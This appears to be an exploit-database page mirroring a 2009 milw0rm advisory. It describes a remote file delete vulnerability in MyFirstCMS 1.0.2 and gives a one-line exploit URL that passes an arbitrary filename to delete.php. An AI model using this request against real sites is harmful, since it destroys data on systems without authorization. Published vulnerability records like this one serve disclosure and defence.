header-logo
Suggest Exploit
vendor:
MyFirstCMS
by:
darkjoker
N/A
CVSS
N/A
Remote File Delete
N/A
CWE
Product Name: MyFirstCMS
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability

This CMS also has other vulnerabilities, such as SQL Injections, but, unfortuntaly, who wrote this CMS was a bit an idiot, because declared functions called, for example, 'try', forgot some ';' or '}' somewhere... Call me lazy or what you want but I don't want to spend time fixing a CMS just for code an exploit ... Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]

Mitigation:

N/A
Source

Exploit-DB raw data:

--+++==========================================================================+++--
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--
--+++==========================================================================+++--


[+] Author   : darkjoker
[+] Site     : http://darkjoker.net23.net
[+] Download : http://ostatic.com/myfirstcms


[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR